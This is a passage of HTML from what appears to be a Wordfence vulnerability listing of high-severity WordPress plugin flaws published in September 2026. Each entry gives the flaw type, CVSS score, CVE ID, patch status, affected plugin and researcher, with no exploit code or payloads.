</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc87f440-d26e-4535-afe4-c4a97b7c591a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89ef2ee1-2bec-459f-9a85-c260cbb129ca" target="_blank" rel="noopener">ShortPixel Image Optimizer &lt;= 6.5.5 &#8211; Authenticated (Author+) PHP Object Injection via Nested JSON Post Content</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17086" target="_blank" rel="noopener noreferrer">							CVE-2026-17086						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortpixel-image-optimiser" target="_blank" rel="noopener">ShortPixel Image Optimizer – Optimize Images, Convert WebP &amp; AVIF</a> <span class="wfvr-software-slug">[shortpixel-image-optimiser]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/josh-bolding" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0c2053c5e38932b707ceb155acd65993.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0c2053c5e38932b707ceb155acd65993"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/josh-bolding" target="_blank" rel="noopener">Josh Bolding</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89ef2ee1-2bec-459f-9a85-c260cbb129ca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73fb7102-66ff-4309-a98f-bbbfd3ddbba6" target="_blank" rel="noopener">The Welcomizer &lt;= 2.8.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Remote Code Execution via &#8216;twiz_custom_logic&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4327" target="_blank" rel="noopener noreferrer">							CVE-2026-4327						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-welcomizer" target="_blank" rel="noopener">The Welcomizer</a> <span class="wfvr-software-slug">[the-welcomizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73fb7102-66ff-4309-a98f-bbbfd3ddbba6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a10ab4d6-318e-4dd6-9f81-ed25f181d074" target="_blank" rel="noopener">WP Cloud Plugins Use-your-Drive, Out-of-the-Box, Share-one-Drive, and Lets-Box &lt;= 3.8.3 &#8211; Authenticated (Subscriber+) Arbitrary File Upload via Media Import</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-93031" target="_blank" rel="noopener noreferrer">							CVE-2026-93031						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shareonedrive-onedrive-plugin-for-wordpress" target="_blank" rel="noopener">Share-one-Drive | OneDrive &amp; SharePoint plugin for WordPress</a> <span class="wfvr-software-slug">[shareonedrive-onedrive-plugin-for-wordpress]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/use-your-drive" target="_blank" rel="noopener">Use-your-Drive | Google Drive plugin for WordPress</a> <span class="wfvr-software-slug">[use-your-drive]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lets-box-2" target="_blank" rel="noopener">WP Cloud Plugins &#8211; Box (Lets-Box)</a> <span class="wfvr-software-slug">[lets-box]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/out-of-the-box-2" target="_blank" rel="noopener">WP Cloud Plugins &#8211; Dropbox (Out-of-the-Box)</a> <span class="wfvr-software-slug">[out-of-the-box]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wp-cloud-plugins" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9c8a9a9336b6784674549968d486619b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9c8a9a9336b6784674549968d486619b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wp-cloud-plugins" target="_blank" rel="noopener">WP Cloud Plugins</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a10ab4d6-318e-4dd6-9f81-ed25f181d074" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0487c6dd-7453-4473-9a13-6b699623f8a9" target="_blank" rel="noopener">Filter Gallery &lt;= 1.1.4 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Gallery Deletion via &#8216;ufg_gallery_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89413" target="_blank" rel="noopener noreferrer">							CVE-2026-89413						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/filter-gallery" target="_blank" rel="noopener">Filter Gallery</a> <span class="wfvr-software-slug">[filter-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0487c6dd-7453-4473-9a13-6b699623f8a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e33da10-321b-4227-ba3c-15ab38177796" target="_blank" rel="noopener">IDB Ecommerce (wpStoreCart 5) &lt;= 5.0.7 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84099" target="_blank" rel="noopener noreferrer">							CVE-2026-84099						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpstorecart" target="_blank" rel="noopener">IDB Ecommerce (wpStoreCart 5)</a> <span class="wfvr-software-slug">[wpstorecart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/reconnaissance" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ab7efdb720bbddbd6d7f9d5def42e06a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ab7efdb720bbddbd6d7f9d5def42e06a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/reconnaissance" target="_blank" rel="noopener">reconnaissance</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e33da10-321b-4227-ba3c-15ab38177796" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd1fc16c-f36b-4c39-916d-36833630729e" target="_blank" rel="noopener">Master Addons for Elementor &lt;= 3.2.2 &#8211; Missing Authorization to Authenticated (Contributor+) Arbitrary Post Modification/Deletion via &#8216;popup_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85410" target="_blank" rel="noopener noreferrer">							CVE-2026-85410						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-addons" target="_blank" rel="noopener">Master Addons for Elementor – Elementor Addons, Widgets, Mega Menu Builder, Popup Builder, Widget Builder &amp; Template Kits</a> <span class="wfvr-software-slug">[master-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd1fc16c-f36b-4c39-916d-36833630729e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3f0251e5-e575-4662-b81d-72c106e92b50" target="_blank" rel="noopener">Paid Downloads &lt;= 3.15 &#8211; Unauthenticated Arbitrary File Upload via &#8216;paiddownloads_update_file&#8217; Action</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87935" target="_blank" rel="noopener noreferrer">							CVE-2026-87935						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-downloads" target="_blank" rel="noopener">Paid Downloads</a> <span class="wfvr-software-slug">[paid-downloads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3f0251e5-e575-4662-b81d-72c106e92b50" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8486d1d-8a76-446e-867b-8db32499ebf8" target="_blank" rel="noopener">Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content &lt;= 4.17.2 &#8211; Authenticated (Subscriber+) Arbitrary Shortcode Execution via &#8216;eup_bio&#8217; Biography Field (Entity-Encoded Shortcode Bracket)</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85658" target="_blank" rel="noopener noreferrer">							CVE-2026-85658						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar" target="_blank" rel="noopener">Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress</a> <span class="wfvr-software-slug">[wp-user-avatar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8486d1d-8a76-446e-867b-8db32499ebf8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55f76629-1b59-415c-96c1-60c138070167" target="_blank" rel="noopener">Album Cover Finder &lt;= 0.7.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84047" target="_blank" rel="noopener noreferrer">							CVE-2026-84047						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/album-cover-finder" target="_blank" rel="noopener">Album Cover Finder</a> <span class="wfvr-software-slug">[album-cover-finder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55f76629-1b59-415c-96c1-60c138070167" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b25fd8e-6aa3-471f-aaf6-114239e9c393" target="_blank" rel="noopener">All Bootstrap Blocks 1.3.20 &#8211; 1.3.31 &#8211; Authenticated (Contributor+) Local File Inclusion</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88994" target="_blank" rel="noopener noreferrer">							CVE-2026-88994						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-bootstrap-blocks" target="_blank" rel="noopener">All Bootstrap Blocks</a> <span class="wfvr-software-slug">[all-bootstrap-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b25fd8e-6aa3-471f-aaf6-114239e9c393" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c12da0cd-ee45-4c25-9023-390f4650a0df" target="_blank" rel="noopener">Design Scuole Italia &lt;= 2.18.1 &#8211; Unauthenticated Arbitrary File Donwload</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87791" target="_blank" rel="noopener noreferrer">							CVE-2026-87791						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-87791" target="_blank" rel="noopener">design-scuole-wordpress-theme</a> <span class="wfvr-software-slug">[design-scuole-wordpress-theme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c12da0cd-ee45-4c25-9023-390f4650a0df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff48db43-9cfa-4dab-b25e-bbc211121f6c" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce &lt;= 4.1.23 &#8211; Authenticated (Subscriber+) Privilege Escalation via map_meta_cap Filter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75983" target="_blank" rel="noopener noreferrer">							CVE-2026-75983						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff48db43-9cfa-4dab-b25e-bbc211121f6c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f0ada9b6-a27c-4336-8550-99294c119a88" target="_blank" rel="noopener">Location Manager &lt;= 2.3.38 &#8211; Unauthenticated SQL Injection via &#8216;latitude&#8217; and &#8216;longitude&#8217; REST API Parameters</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85705" target="_blank" rel="noopener noreferrer">							CVE-2026-85705						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodir_location_manager" target="_blank" rel="noopener">Location Manager</a> <span class="wfvr-software-slug">[geodir_location_manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f0ada9b6-a27c-4336-8550-99294c119a88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f380b48-9939-4066-a563-eea66b252cae" target="_blank" rel="noopener">Ni WooCommerce Sales Report &lt;= 4.1.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78472" target="_blank" rel="noopener noreferrer">							CVE-2026-78472						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
